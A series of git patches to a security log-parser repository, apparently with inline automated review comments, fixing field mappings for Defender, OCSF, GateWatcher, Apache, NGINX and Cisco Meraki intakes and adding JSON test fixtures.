"{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565\",\"Initiatin
gProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAl
l\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}", From 5117fb76618889a055556ebd726f09beae26626c Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Wed, 2 Oct 2024 12:27:06 +0200 Subject: [PATCH 103/317] Delete repeated field --- Microsoft/microsoft-365-defender/ingest/parser.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index d0ff72f0a..d183492a1 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -275,7 +275,6 @@ stages: process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}" process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}" process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" From 9b1eb8b9f3041659fb6bbd6d45718c5ebcc288d0 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 2 Oct 2024 14:34:36 +0200 Subject: [PATCH 104/317] fix(OCSF): add the supported version of the framework --- OCSF/ocsf/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml index b962f6e78..c48ddf754 100644 --- a/OCSF/ocsf/_meta/manifest.yml +++ b/OCSF/ocsf/_meta/manifest.yml @@ -7,6 +7,8 @@ slug: ocsf description: >- The Open Cybersecurity Schema Framework is an open-source project, delivering an extensible framework for developing schemas, along with a vendor-agnostic core security schema. + Supported version: **1.1** + data_sources: File monitoring: Network device logs: From 221e4395137296003cb988f47be84ee536557f46 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 2 Oct 2024 14:34:59 +0200 Subject: [PATCH 105/317] fix(OCSF): add description to data_sources --- OCSF/ocsf/_meta/manifest.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml index c48ddf754..88a43ab48 100644 --- a/OCSF/ocsf/_meta/manifest.yml +++ b/OCSF/ocsf/_meta/manifest.yml 
@@ -10,6 +10,6 @@ description: >- Supported version: **1.1** data_sources: - File monitoring: - Network device logs: - Process monitoring: + File monitoring: OCSF allows collecting system activities + Network device logs: OCSF allows collection network activities + Process monitoring: OCSF allows collecting application activities From 8cab1aeb661f3f262488c02c6c0e3bc22447cdbf Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 2 Oct 2024 14:35:12 +0200 Subject: [PATCH 106/317] fix(OCSF): add beta flag --- OCSF/ocsf/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/OCSF/ocsf/_meta/manifest.yml b/OCSF/ocsf/_meta/manifest.yml index 88a43ab48..b8f0e2b86 100644 --- a/OCSF/ocsf/_meta/manifest.yml +++ b/OCSF/ocsf/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: a9c959ac-78ec-47a4-924e-8156a77cebf5 automation_connector_uuid: 04c40271-b44e-4977-8c62-5356011b2bb6 automation_module_uuid: b4462429-6f0f-42b5-87b8-430111697d28 -name: OCSF +name: OCSF [BETA] slug: ocsf description: >- From b5eb09ecd0e89aabb9a637b76e28d07b60d8da1a Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 2 Oct 2024 16:45:13 +0200 Subject: [PATCH 107/317] fix(GateWatcher): remove event.kind:'event' --- GateWatcher/aioniq_ecs/ingest/parser.yml | 4 +++- GateWatcher/aioniq_ecs/tests/history.json | 1 - GateWatcher/aioniq_ecs/tests/metadata.json | 1 - GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json | 1 - 4 files changed, 3 insertions(+), 4 deletions(-) diff --git a/GateWatcher/aioniq_ecs/ingest/parser.yml b/GateWatcher/aioniq_ecs/ingest/parser.yml index 2c654e662..bdcbb794c 100644 --- a/GateWatcher/aioniq_ecs/ingest/parser.yml +++ b/GateWatcher/aioniq_ecs/ingest/parser.yml 
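Review bot: `Network device logs: OCSF allows collection network activities` in the new `data_sources` text looks like a typo; the two sibling entries use the gerund, so it should read `Network device logs: OCSF allows collecting network activities`. The three descriptions also add little beyond the key name — if they are meant to point at the OCSF event categories the intake covers (system, network and application activity classes), naming those classes would help someone deciding whether this intake fits their source. Both changes are wording only.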
@@ -112,13 +112,15 @@ stages: event: actions: - set: - event.kind: "{{json_load.message.event.kind}}" event.module: "{{json_load.message.event.module}}" event.dataset: "{{json_load.message.event.dataset}}" event.category: "{{json_load.message.event.category}}" event.severity: "{{json_load.message.event.severity}}" gatewatcher.event.id: "{{json_load.message.event.id}}" gatewatcher.event.created: "{{json_load.message.event.created}}" + - set: + event.kind: "{{json_load.message.event.kind}}" + filter: '{{json_load.message.event.kind != "event"}}' source: actions: - set: diff --git a/GateWatcher/aioniq_ecs/tests/history.json b/GateWatcher/aioniq_ecs/tests/history.json index 7f04542c5..4df683706 100644 --- a/GateWatcher/aioniq_ecs/tests/history.json +++ b/GateWatcher/aioniq_ecs/tests/history.json @@ -15,7 +15,6 @@ "host" ], "dataset": "administration", - "kind": "event", "module": "history" }, "@timestamp": "2022-09-01T16:06:51.664000Z", diff --git a/GateWatcher/aioniq_ecs/tests/metadata.json b/GateWatcher/aioniq_ecs/tests/metadata.json index 8814beb9d..168b2ea05 100644 --- a/GateWatcher/aioniq_ecs/tests/metadata.json +++ b/GateWatcher/aioniq_ecs/tests/metadata.json @@ -15,7 +15,6 @@ "network" ], "dataset": "network_metadata", - "kind": "event", "module": "sigflow_http" }, "@timestamp": "2024-09-12T13:24:51.231000Z", diff --git a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json index c75ee56b5..a089e4418 100644 --- a/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json +++ b/GateWatcher/aioniq_ecs/tests/metadata_fileinfo.json @@ -16,7 +16,6 @@ "network" ], "dataset": "network_metadata", - "kind": "event", "module": "sigflow_file" }, "@timestamp": "2024-09-11T13:56:19.010000Z", From e6ab60b7af02acf49012bec749ec08041c26fa46 Mon Sep 17 00:00:00 2001 
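Review bot: The new `filter: '{{json_load.message.event.kind != "event"}}'` on the second `set` does not guard against a missing `event.kind`: an absent key compares unequal to `"event"`, so the action still runs and writes an empty `event.kind` (whether the platform drops empty values is not visible here). The accessor form states the intent and avoids the empty write: `filter: '{{json_load.message.event.get("kind") not in [None, "", "event"]}}'`. A one-line comment above the second `set`, e.g. `# 'event' is the ECS default kind; only forward non-default kinds`, would keep the next reader from re-adding the unconditional mapping that this commit removes. The enclosing `stages` mapping starts and ends outside the hunk.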
From: Sebastien Quioc Date: Wed, 2 Oct 2024 16:45:41 +0200 Subject: [PATCH 108/317] fix(GateWatcher): add smart-description for history events --- .../aioniq_ecs/_meta/smart-descriptions.json | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json b/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json index aa6f3ba2b..b879d79fc 100644 --- a/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json +++ b/GateWatcher/aioniq_ecs/_meta/smart-descriptions.json @@ -47,6 +47,19 @@ } ] }, + { + "value": "{event.module} : {gatewatcher.history.type} {gatewatcher.history.name} {gatewatcher.history.method} {gatewatcher.history.endpoint}", + "conditions": [ + { + "field": "event.dataset", + "value": "administration" + }, + { + "field": "event.module", + "value": "history" + } + ] + }, { "value": "{event.module} : {gatewatcher.beacon.hostname_resolution} on {network.protocol} ({source.ip}:{source.port} -> {destination.ip}:{destination.port})", "conditions": [ From d5a7689729a3d92058d04f2d843c4e581491120a Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 3 Oct 2024 10:23:17 +0200 Subject: [PATCH 109/317] fix on Apache parser for additional "-" in the logs --- Apache/apache/ingest/parser.yml | 2 +- Apache/apache/tests/access_failure.json | 53 +++++++++++++++++++ Apache/apache/tests/access_redirect.json | 53 +++++++++++++++++++ Apache/apache/tests/access_success.json | 66 ++++++++++++++++++++++++ 4 files changed, 173 insertions(+), 1 deletion(-) create mode 100644 Apache/apache/tests/access_failure.json create mode 100644 Apache/apache/tests/access_redirect.json create mode 100644 Apache/apache/tests/access_success.json diff --git a/Apache/apache/ingest/parser.yml b/Apache/apache/ingest/parser.yml index ceb5fe576..85ade0aa9 100644 --- a/Apache/apache/ingest/parser.yml +++ b/Apache/apache/ingest/parser.yml 
@@ -15,7 +15,7 @@ pipeline: HTTPD24_ERRORLOG: '\[%{HTTPDERROR_DATE}\] \[%{WORD}?:%{LOGLEVEL:action_name}\] \[pid %{POSINT:process_id}(:tid %{NUMBER:process_thread_id})?\]( \(%{POSINT}\)%{DATA}:)?( \[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{POSINT:source_port})?\])?( %{DATA}:)? %{GREEDYDATA:action_outcome_reason}' HTTPD_COMBINEDLOG: '%{HTTPD_COMMONLOG} "%{DATA:http_request_referrer}" "%{DATA:user_agent_original}"' HTTPD_COMMONLOG: >- - (%{IPORHOST:destination_address}(:%{NUMBER:destination_port})? )?%{IPORHOST:source_ip} (?:-|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA} + ((%{IPORHOST:destination_address}(:%{NUMBER:destination_port})|-)? )?%{IPORHOST:source_ip} (?:(\()?-(\))?|%{HTTPDUSER:apache_access_user_identity}) (?:-( -)*|%{HTTPDUSER:user_name}) \[%{HTTPDATE:timestamp}]\ "(?:%{WORD:http_request_method} %{NOTSPACE:url_original}(?: HTTP/%{NUMBER:http_version})?|%{DATA})" (?:-|%{INT:http_response_status_code:int}) (?:-|%{INT:http_response_body_bytes:int})%{GREEDYDATA} # Apache ModSecurity logs APACHEERRORPREFIX: '(\[%{HTTPDERROR_DATE:timestamp}\] )?(\[%{WORD}?:%{LOGLEVEL:action_name}\] )?(\[pid %{POSINT:process_pid}(:tid %{NUMBER:process_thread_id})?\] )?(\[client (%{IP:source_ip}|%{HOSTNAME:source_domain})?(:%{NUMBER:source_port})?\])?.*' MODSECHOSTNAME: '\[hostname "?%{DATA:destination_domain}"?\]' diff --git a/Apache/apache/tests/access_failure.json b/Apache/apache/tests/access_failure.json new file mode 100644 index 000000000..4fbd29b15 --- /dev/null +++ b/Apache/apache/tests/access_failure.json 
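Review bot: The new identity alternative `(?:(\()?-(\))?|%{HTTPDUSER:apache_access_user_identity})` accepts unbalanced forms such as `(-` and `-)` as well as the intended `(-)`, and it adds two unnamed capture groups to a pattern that otherwise uses only named captures (some grok engines expose those as numbered fields unless configured not to); a stricter equivalent is `(?:\(-\)|-|%{HTTPDUSER:apache_access_user_identity})`. The same hunk makes the leading `((%{IPORHOST:destination_address}(:%{NUMBER:destination_port})|-)? )?` group accept a `-` placeholder, but none of the three new tests carries a real destination address or port, so a regression in that branch would go unnoticed. A comment on the `HTTPD_COMMONLOG` line naming the LogFormat variants the pattern is meant to accept (leading vhost/port or `-`, `(-)` identity, repeated `-` user placeholders) would be useful, since the grok is the only place that contract lives.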
@@ -0,0 +1,53 @@ +{ + "input": { + "message": "- 1234:567:abcd:890:1234:5678:abcd:9012 - - [01/Oct/2024:10:22:11 +0200] \"GET /test.fr HTTP/1.1\" 404 1450 \"-\" \"-\"", + "sekoiaio": { + "intake": { + "dialect": "Apache HTTP Server", + "dialect_uuid": "6c2a44e3-a86a-4d98-97a6-d575ffcb29f7" + } + } + }, + "expected": { + "message": "- 1234:567:abcd:890:1234:5678:abcd:9012 - - [01/Oct/2024:10:22:11 +0200] \"GET /test.fr HTTP/1.1\" 404 1450 \"-\" \"-\"", + "event": { + "category": [ + "web" + ], + "outcome": "failure", + "type": [ + "access" + ] + }, + "action": { + "name": "GET", + "outcome": "failure", + "properties": { + "timestamp": "01/Oct/2024:10:22:11 +0200" + } + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "bytes": 1450, + "status_code": 404 + }, + "version": "1.1" + }, + "related": { + "ip": [ + "1234:567:abcd:890:1234:5678:abcd:9012" + ] + }, + "source": { + "address": "1234:567:abcd:890:1234:5678:abcd:9012", + "ip": "1234:567:abcd:890:1234:5678:abcd:9012" + }, + "url": { + "original": "/test.fr", + "path": "/test.fr" + } + } +} \ No newline at end of file diff --git a/Apache/apache/tests/access_redirect.json b/Apache/apache/tests/access_redirect.json new file mode 100644 index 000000000..d933d37df --- /dev/null +++ b/Apache/apache/tests/access_redirect.json 
@@ -0,0 +1,53 @@ +{ + "input": { + "message": "- 1.2.3.4 - - [01/Oct/2024:10:22:01 +0200] \"GET / HTTP/1.1\" 302 385 \"-\" \"-\"", + "sekoiaio": { + "intake": { + "dialect": "Apache HTTP Server", + "dialect_uuid": "6c2a44e3-a86a-4d98-97a6-d575ffcb29f7" + } + } + }, + "expected": { + "message": "- 1.2.3.4 - - [01/Oct/2024:10:22:01 +0200] \"GET / HTTP/1.1\" 302 385 \"-\" \"-\"", + "event": { + "category": [ + "web" + ], + "outcome": "redirect", + "type": [ + "access" + ] + }, + "action": { + "name": "GET", + "outcome": "redirect", + "properties": { + "timestamp": "01/Oct/2024:10:22:01 +0200" + } + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "bytes": 385, + "status_code": 302 + }, + "version": "1.1" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "original": "/", + "path": "/" + } + } +} \ No newline at end of file diff --git a/Apache/apache/tests/access_success.json b/Apache/apache/tests/access_success.json new file mode 100644 index 000000000..7bec8a15c --- /dev/null +++ b/Apache/apache/tests/access_success.json 
@@ -0,0 +1,66 @@ +{ + "input": { + "message": "1.2.3.4 (-) - - [01/Oct/2024:08:22:45 +0000] \"POST /App/tests HTTP/1.1\" 200 377 \"https://app.testing.fr/App/6\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\"", + "sekoiaio": { + "intake": { + "dialect": "Apache HTTP Server", + "dialect_uuid": "6c2a44e3-a86a-4d98-97a6-d575ffcb29f7" + } + } + }, + "expected": { + "message": "1.2.3.4 (-) - - [01/Oct/2024:08:22:45 +0000] \"POST /App/tests HTTP/1.1\" 200 377 \"https://app.testing.fr/App/6\" \"Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko\"", + "event": { + "category": [ + "web" + ], + "outcome": "success", + "type": [ + "access" + ] + }, + "action": { + "name": "POST", + "outcome": "success", + "properties": { + "timestamp": "01/Oct/2024:08:22:45 +0000" + } + }, + "http": { + "request": { + "method": "POST", + "referrer": "https://app.testing.fr/App/6" + }, + "response": { + "bytes": 377, + "status_code": 200 + }, + "version": "1.1" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "original": "/App/tests", + "path": "/App/tests" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "IE", + "original": "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko", + "os": { + "name": "Windows", + "version": "8" + }, + "version": "11.0" + } + } +} \ No newline at end of file From bc7d883e3d9f699ce97c8130e5a3bcd3f2c6eef6 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 3 Oct 2024 11:21:53 +0200 Subject: [PATCH 110/317] fix on NGINX: allowing conversion of string to int on action.outcome --- NGINX/nginx/ingest/parser.yml | 6 ++-- NGINX/nginx/tests/json_get.json | 61 +++++++++++++++++++++++++++++++++ 2 files changed, 64 insertions(+), 3 deletions(-) create mode 100644 NGINX/nginx/tests/json_get.json diff --git a/NGINX/nginx/ingest/parser.yml b/NGINX/nginx/ingest/parser.yml index 8a7f7c38b..a3bb82c74 100644 
--- a/NGINX/nginx/ingest/parser.yml
+++ b/NGINX/nginx/ingest/parser.yml
@@ -149,11 +149,11 @@ stages:
 {%- endif -%}
 action.outcome: >
 {%- if parsed_event.message.get("response_status") != None -%}
- {%- if parsed_event.message.response_status < 200 -%}
+ {%- if 100 <= parsed_event.message.response_status | int < 200 -%}
 information
- {%- elif parsed_event.message.response_status < 300 -%}
+ {%- elif 100 < parsed_event.message.response_status| int < 300 -%}
 success
- {%- elif parsed_event.message.response_status < 400 -%}
+ {%- elif 100 < parsed_event.message.response_status | int < 400 -%}
 redirect
 {%- else -%}
 failure
diff --git a/NGINX/nginx/tests/json_get.json b/NGINX/nginx/tests/json_get.json
new file mode 100644
index 000000000..0b3f93100
--- /dev/null
+++ b/NGINX/nginx/tests/json_get.json
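Review bot: The lower bounds added to the two `elif` branches are redundant and read wrong: anything reaching them has already failed `100 <= … < 200`, so `100 <` adds nothing while suggesting a different range starts there; `{%- elif parsed_event.message.response_status | int < 300 -%}` (and likewise `< 400`) says the same thing. Note also that Jinja's `int` filter returns 0 for a value it cannot convert, so a non-numeric `response_status` now falls through every branch to `failure` silently, where the old string-versus-int comparison would have raised; if that is intended, a one-line comment above the block saying so would save the next reader the trace. The spacing in `response_status| int` is also inconsistent with the other two branches. The `set` action this block belongs to starts before the hunk.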
@@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"connection_serial_number\":123456789,\"number_of_requests\":1,\"response_status\":\"200\",\"body_bytes_sent\":37273,\"content_type\":\"\",\"host\":\"www.test.fr\",\"host_name\":\"nginxe.test.fr\",\"http_name\":\"\",\"https\":\"on\",\"proxy_protocol_addr\":\"\",\"proxy_protocol_port\":\"\",\"query_string\":\"redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F\",\"client_address\":\"1.2.3.4\",\"http_ar_real_proto\":\"\",\"http_ar_real_ip\":\"\",\"http_ar_real_country\":\"\",\"http_x_real_ip\":\"\",\"http_x_forwarded_for\":\"1234:567:abcd:890:1234:5678:abcd:9012\",\"http_config\":\"\",\"client_port\":\"43834\",\"remote_user\":\"\",\"request\":\"GET /fr/test-integration?redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F HTTP/2.0\",\"request_time\":0.264,\"request_id\":\"1234567890abcdefg1234567890abcde\",\"request_length\":1481,\"sekoia.intake.nginx\":\"AbCdEfG1aBcDeFg2AbCdEfG3aBcDeFg4\"}", + "sekoiaio": { + "intake": { + "dialect": "F5 NGINX", + "dialect_uuid": "ab25af2e-4916-40ba-955c-34d2301c1f51" + } + } + }, + "expected": { + "message": "{\"connection_serial_number\":123456789,\"number_of_requests\":1,\"response_status\":\"200\",\"body_bytes_sent\":37273,\"content_type\":\"\",\"host\":\"www.test.fr\",\"host_name\":\"nginxe.test.fr\",\"http_name\":\"\",\"https\":\"on\",\"proxy_protocol_addr\":\"\",\"proxy_protocol_port\":\"\",\"query_string\":\"redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F\",\"client_address\":\"1.2.3.4\",\"http_ar_real_proto\":\"\",\"http_ar_real_ip\":\"\",\"http_ar_real_country\":\"\",\"http_x_real_ip\":\"\",\"http_x_forwarded_for\":\"1234:567:abcd:890:1234:5678:abcd:9012\",\"http_config\":\"\",\"client_port\":\"43834\",\"remote_user\":\"\",\"request\":\"GET /fr/test-integration?redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F 
HTTP/2.0\",\"request_time\":0.264,\"request_id\":\"1234567890abcdefg1234567890abcde\",\"request_length\":1481,\"sekoia.intake.nginx\":\"AbCdEfG1aBcDeFg2AbCdEfG3aBcDeFg4\"}", + "event": { + "category": [ + "web" + ], + "dataset": "access", + "duration": 264000000.0, + "outcome": "success", + "type": [ + "error" + ] + }, + "action": { + "name": "GET", + "outcome": "success" + }, + "destination": { + "address": "www.test.fr", + "domain": "www.test.fr" + }, + "host": { + "name": "nginxe.test.fr" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "bytes": 37273, + "status_code": 200 + }, + "version": "2.0" + }, + "observer": { + "product": "nginx", + "type": "WEB server", + "vendor": "F5" + }, + "related": { + "hosts": [ + "www.test.fr" + ] + }, + "url": { + "original": "/fr/test-integration?redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F", + "path": "/fr/test-integration", + "query": "redirect=%2Fen%2Fd%2F1766477%3Fredirect%3D%252Fen%252F" + } + } +} \ No newline at end of file From 378e3832fbb6fe83de6baaa47988feee33d21fa2 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 3 Oct 2024 14:58:27 +0300 Subject: [PATCH 111/317] Cisco Meraki MX - parse MAC address --- Cisco/cisco-meraki/ingest/parser.yml | 2 + .../tests/test_flows_with_mac.json | 46 +++++++++++++++++++ 2 files changed, 48 insertions(+) create mode 100644 Cisco/cisco-meraki/tests/test_flows_with_mac.json diff --git a/Cisco/cisco-meraki/ingest/parser.yml b/Cisco/cisco-meraki/ingest/parser.yml index 85652b26a..7f3baaa74 100644 --- a/Cisco/cisco-meraki/ingest/parser.yml +++ b/Cisco/cisco-meraki/ingest/parser.yml @@ -210,6 +210,8 @@ stages: user_agent.original: "{{kv_part_message.message.agent}}" set_flows: actions: + - set: + source.mac: "{{kv_part_message.message.mac}}" - dictionary: "0": allow "1": deny diff --git a/Cisco/cisco-meraki/tests/test_flows_with_mac.json b/Cisco/cisco-meraki/tests/test_flows_with_mac.json new file mode 100644 index 000000000..81b5eebbe 
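Review bot: The expected block pins `event.type: ["error"]` for a request that is also asserted as `event.outcome: "success"`, `http.response.status_code: 200` and `event.dataset: "access"`; that combination looks like a parser-side defect being locked in by the fixture rather than intended behaviour, and is worth confirming before merge. The input also carries `client_address` (`1.2.3.4`) and `client_port`, yet nothing under `source` is asserted, so whether the JSON dialect populates `source.ip` at all is not exercised here. `event.duration` is pinned as the float `264000000.0`; an integer nanosecond value would be the usual shape for that field.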
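Review bot: `source.mac` is copied verbatim from `kv_part_message.message.mac`, and the new fixture in the next hunk pins it as lowercase, colon-separated `00:11:22:33:44:55`; ECS recommends uppercase hex bytes separated by hyphens for `*.mac` fields, so if this intake follows ECS conventions a normalisation step (or a documented exception) is needed before the fixture cements the raw form. The `set` is also unconditional: for flow lines without a `mac=` pair it renders an empty string, which is only harmless if the pipeline drops empty values — a `filter: "{{kv_part_message.message.get('mac') != None}}"` on the action would make that explicit. The `set_flows` stage continues outside the hunk.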
--- /dev/null
+++ b/Cisco/cisco-meraki/tests/test_flows_with_mac.json
@@ -0,0 +1,46 @@
+{
+ "input": {
+ "message": "1727862163.911654119 FW_MX_01 flows allow src=1.2.3.4 dst=5.6.7.8 mac=00:11:22:33:44:55 protocol=icmp6 type=136"
+ },
+ "expected": {
+ "message": "1727862163.911654119 FW_MX_01 flows allow src=1.2.3.4 dst=5.6.7.8 mac=00:11:22:33:44:55 protocol=icmp6 type=136",
+ "event": {
+ "category": [
